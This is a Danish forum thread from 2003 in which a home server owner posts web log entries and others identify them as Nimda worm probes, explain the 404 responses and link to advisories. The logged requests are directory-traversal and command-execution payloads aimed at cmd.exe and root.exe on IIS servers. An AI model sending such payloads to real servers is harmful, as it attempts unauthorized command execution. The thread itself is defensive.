/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Er dette her et forsøg på "hacking"?
Fra : Ukendt


Dato : 07-06-03 21:17

80.164.53.10x- - [05/Jun/2003:21:25:59 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:00 +0200] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:02 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:04 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:06 +0200] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:08 +0200] "GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:10 +0200] "GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:12 +0200] "GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:15 +0200] "GET
/scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:18 +0200] "GET
/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:20 +0200] "GET
/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:23 +0200] "GET
/scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:25 +0200] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:28 +0200] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:30 +0200] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
Det er fra loggen i min sambarserver og jeg syntes da at det ser lidt
underligt ud med de der commandpromt-ting og c+dir
jeg har fjernet det sidste tal i ip-nummeret i tilfælde af at det
skulle være noget ganske uskyldigt. Det siger i grunden heller ikke
mere end at det er en tdc-adsl kunde.
Jeg kører med en proudgave af zonealarm, men er det nok til at holde
folk fra at hacke?
Mvh Heinrich

 
 
Bent Sørensen (07-06-2003)
Kommentar
Fra : Bent Sørensen


Dato : 07-06-03 21:41

Hej,

"Heinrich Borchmann" <heinrich(snabela)borchmann.org> wrote in message
news:nhh4ev41tmbrkg4hn0vgd9koo90ipi5fgq@4ax.com...
> 80.164.53.10x- - [05/Jun/2003:21:25:59 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> 80.164.53.10x- - [05/Jun/2003:21:26:00 +0200] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"

[snip]

> Det er fra loggen i min sambarserver og jeg syntes da at det ser lidt
> underligt ud med de der commandpromt-ting og c+dir
> jeg har fjernet det sidste tal i ip-nummeret i tilfælde af at det
> skulle være noget ganske uskyldigt. Det siger i grunden heller ikke
> mere end at det er en tdc-adsl kunde.

Det ligner en Nimda Orm, der forsøger at sprede sig. Se
følgende link for mere info:

http://www.cert.org/advisories/CA-2001-26.html

De entries du nævner, står under "System FootPrint".

/Bent



15kw (07-06-2003)
Kommentar
Fra : 15kw


Dato : 07-06-03 22:13

"Heinrich Borchmann" <heinrich(snabela)borchmann.org> skrev i
news:nhh4ev41tmbrkg4hn0vgd9koo90ipi5fgq@4ax.com

> Det er fra loggen i min sambarserver og jeg syntes da at det ser lidt
> underligt ud med de der commandpromt-ting og c+dir
> jeg har fjernet det sidste tal i ip-nummeret i tilfælde af at det
> skulle være noget ganske uskyldigt. Det siger i grunden heller ikke
> mere end at det er en tdc-adsl kunde.

Der er en computer der er inficeret med Nimda, som så prøver at inficere din
server, men det kan den ikke.

Du skal se efter hvad der står til sidst i linierne:
404 565 0 "-" "-"

404 = Not Found
565 = Er størrelsen i byte på den fejl mælding du smider tilbage.
0 = 0mSec
"-" url adressen som brugeren kom fra.
"-" Hvilken browser brugeren har.

Du kan prøve at gå ind i det dir der hedder syshelp og se filen LOGFMT.HTM



--
Hilsen
Peter N Petersen
http://peteropfinder.dk





Christian Andersen (07-06-2003)
Kommentar
Fra : Christian Andersen


Dato : 07-06-03 22:45

Heinrich Borchmann wrote:

> Jeg kører med en proudgave af zonealarm, men er det nok til at holde
> folk fra at hacke?

Andre har allerede svaret på, hvad de enkelte ting i loggen betyder.

Jeg vil bare henvise dig til følgende sider:

http://a.area51.dk/sikkerhed/hjemme_pc#firewall

og

http://a.area51.dk/sikkerhed/hjemme_net#fwbesked (samt næste afsnit)

--
Party time, excellent, wiuuuu, wiuuuu, wiuuuuuuu!!!

Ukendt (08-06-2003)
Kommentar
Fra : Ukendt


Dato : 08-06-03 01:05

On 7 Jun 2003 21:45:08 GMT, Christian Andersen
<i8qti5i02@sneakemail.com> wrote:

>Heinrich Borchmann wrote:
>
>> Jeg kører med en proudgave af zonealarm, men er det nok til at holde
>> folk fra at hacke?
>
>Andre har allerede svaret på, hvad de enkelte ting i loggen betyder.
>
>Jeg vil bare henvise dig til følgende sider:

Jeg takker for jeres svar Så ser det jo ud til at mine
sikkerhedsforanstaltninger virker........
Mvh Heinrich

Søg
Reklame
Statistik
Spørgsmål : 177552
Tips : 31968
Nyheder : 719565
Indlæg : 6408847
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste